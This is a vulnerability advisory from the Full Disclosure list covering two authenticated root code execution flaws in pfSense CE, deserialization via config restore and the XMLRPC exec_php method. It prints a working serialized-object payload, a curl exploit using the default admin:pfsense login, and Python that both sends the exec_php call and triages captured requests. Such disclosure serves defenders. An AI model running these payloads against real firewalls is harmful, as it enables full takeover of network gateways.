Advisory: Authenticated Remote Code Execution in pfSense CE
CVEs: CVE-2025-69690, CVE-2025-69691
Researcher: Nelson Adhepeau ([email protected])
Date: February 2026


== RESPONSIBLE DISCLOSURE NOTICE ==

This advisory is published in accordance with responsible disclosure practices. 

The vendor was notified on December 2, 2025, acknowledged the reports, and 
indicated no patches would be issued. Publication follows standard 90-day 
disclosure guidelines.

-------------------------------------------------------------

== OVERVIEW ==

Two independent authenticated Remote Code Execution
vulnerabilities were discovered in Netgate pfSense Community
Edition. Both were reproduced on clean installations. The vendor
was contacted, acknowledged the reports, and classified both
as expected behavior for authenticated administrators.

-------------------------------------------------------------

== CVE-2025-69690 ==
Authenticated RCE via Unsafe Deserialization (pfSense CE 2.7.2)

CVSS v3.1: 8.8 (High)
Vector: AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
CWE-502: Deserialization of Untrusted Data
CWE-915: Improperly Controlled Dynamic Code Evaluation

-- Description --

The pfSense configuration restore mechanism passes user-controlled
backup data to unserialize() without restricting the classes that
may be instantiated (PHP's allowed_classes option), validating the
input, or sandboxing the result.

A crafted backup file containing a malicious serialized PHP
object can therefore inject arbitrary commands through the
post_reboot_commands property; these are later executed by
mwexec() with root privileges.

-- Affected Component --

backup/restore mechanism, config.php,
pfsense_module_installer class, unserialize() handling

-- Attack Vector --

1. Attacker authenticates as administrator
2. Uploads malicious configuration backup file
3. Triggers restore operation
4. pfSense unserializes attacker-controlled data
5. Commands execute as root via mwexec()

-- PoC Payload --

O:24:"pfsense_module_installer":1:{
  s:23:"\0*\0post_reboot_commands";
  a:1:{i:0;s:37:"/usr/local/bin/php -r 'system("id");'";}}

(\0 denotes a NUL byte: PHP stores a protected property name as
"\0*\0name", and the s: length counts those bytes. Every length
prefix must match exactly or unserialize() rejects the payload;
the line breaks above are for readability only.)

-- Impact --

- Arbitrary command execution as root
- Persistent compromise
- Complete firewall takeover
- Credential and configuration exfiltration

-- Vendor Response --

Netgate acknowledged the report. Classified as
"authenticated administrative abuse". No patch issued.
Vendor does not assign CVEs directly.

-------------------------------------------------------------

== CVE-2025-69691 ==
Authenticated RCE via XMLRPC exec_php (pfSense CE 2.8.0)

CVSS v3.1: 9.9 (Critical)
Vector: AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CWE-284: Improper Access Control
CWE-915: Improperly Controlled Dynamic Code Evaluation

-- Description --

pfSense CE 2.8.0 exposes an XMLRPC API method,
pfsense.exec_php, that executes arbitrary PHP code as root
without validation, sandboxing, or restrictions.

The endpoint is enabled by default, reachable over HTTPS with
HTTP Basic Authentication, and executes the supplied code
immediately with full system privileges. The factory default
credentials (admin:pfsense) remain in use on many deployments,
which lowers the exploitation barrier considerably.

-- Affected Component --

xmlrpc.php, pfsense.exec_php method, XMLRPC API handler,
BasicAuth authentication layer

-- Attack Vector --

curl -k -u admin:pfsense \
  -d '<methodCall>
    <methodName>pfsense.exec_php</methodName>
    <params><param><value><string>
      system("id");
    </string></value></param></params>
  </methodCall>' \
  https://<target>/xmlrpc.php
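
Two things a practitioner wants beside that curl line: the same request
built with a real XML-RPC library, and a triage routine for captured
POSTs to /xmlrpc.php that flags the code-execution method and the
factory credentials. The block below is an added example in Python, not
pfSense or advisory code. The host, credentials and the sample captured
request are placeholders constructed for the example; the triage assumes
something in front of the webGUI (reverse proxy, WAF, packet capture)
can hand it the Authorization header and the request body, since a
plain web-server access log does not record either.

```python
"""XML-RPC exec_php: request construction and request triage for
CVE-2025-69691.  Added example, not pfSense or advisory code.  Host,
credentials and the sample captured request are placeholders."""
import base64
import ssl
import xmlrpc.client
from urllib.parse import quote

CODE_EXEC_METHODS = {"pfsense.exec_php"}     # method named in the advisory
FACTORY_CREDENTIALS = ("admin", "pfsense")    # pfSense default login


def build_exec_php_call(php_code: str) -> str:
    """XML-RPC methodCall body equivalent to the curl payload above."""
    return xmlrpc.client.dumps((php_code,), methodname="pfsense.exec_php")


def call_exec_php(host: str, username: str, password: str, php_code: str,
                  verify_tls: bool = True):
    """Send the call to a live pfSense host (network; not exercised by the
    tests).  Basic auth is carried in the URL, which xmlrpc.client turns
    into an Authorization header; verify_tls=False matches curl -k."""
    ctx = ssl.create_default_context()
    if not verify_tls:
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    url = "https://%s:%s@%s/xmlrpc.php" % (quote(username, safe=""),
                                           quote(password, safe=""), host)
    proxy = xmlrpc.client.ServerProxy(url, context=ctx)
    return proxy.pfsense.exec_php(php_code)


def triage_request(headers: dict, body: str) -> dict:
    """Classify one captured POST to /xmlrpc.php: which method it calls,
    whether that method executes code, the PHP it carries, and whether
    the Basic credentials are the factory default."""
    result = {"method": None, "code_exec": False, "php": None,
              "default_credentials": False}
    try:
        params, method = xmlrpc.client.loads(body)
    except Exception:            # not a well-formed methodCall
        return result
    result["method"] = method
    if method in CODE_EXEC_METHODS:
        result["code_exec"] = True
        result["php"] = params[0] if params else ""
    auth = headers.get("Authorization", "")
    if auth.startswith("Basic "):
        try:
            user, _, pw = base64.b64decode(auth[6:]).decode().partition(":")
            result["default_credentials"] = (user, pw) == FACTORY_CREDENTIALS
        except (ValueError, UnicodeDecodeError):
            pass
    return result


# Constructed sample: what a proxy in front of the webGUI would capture
# for the curl command in the advisory.
SAMPLE_HEADERS = {
    "Authorization": "Basic " + base64.b64encode(b"admin:pfsense").decode(),
    "Content-Type": "text/xml",
}
SAMPLE_BODY = build_exec_php_call('system("id");')

if __name__ == "__main__":
    print(triage_request(SAMPLE_HEADERS, SAMPLE_BODY))
    # call_exec_php("192.0.2.1", "admin", "pfsense", "system('id');", verify_tls=False)
```

The triage result for the constructed sample reports the
pfsense.exec_php method, the PHP it carries and a default-credential
hit, which is the combination worth alerting on; a hit on exec_php
alone from a non-default account still means someone is running code
as root through the sync API and belongs in the same alert.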

-- Impact --

- Full remote root compromise
- Arbitrary file read/write
- Backdoor deployment
- Firewall rule manipulation
- Extraction of secrets and configurations

-- Vendor Response --

Netgate acknowledged the report. Classified as expected
behavior for authenticated users. No patch in pfSense CE
2.8.0. Still exploitable as of latest version at time
of disclosure.

-------------------------------------------------------------

== TIMELINE ==

- November 2025: Vulnerabilities discovered
- December 2, 2025: Initial report sent to Netgate
- Netgate acknowledged, no patch planned
- January 28, 2026: CVEs assigned by MITRE
- February 2026: Public disclosure

-------------------------------------------------------------

== REFERENCES ==

CVE-2025-69690:
https://cve.org/CVERecord?id=CVE-2025-69690

CVE-2025-69691:
https://cve.org/CVERecord?id=CVE-2025-69691

Researcher:
https://github.com/privlabs
https://linkedin.com/in/nelson-adhepeau

-------------------------------------------------------------
Nelson Adhepeau
Independent Security [email protected]


Sent with Proton Mail secure email.

Attachment: signature.asc
Description: OpenPGP digital signature

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
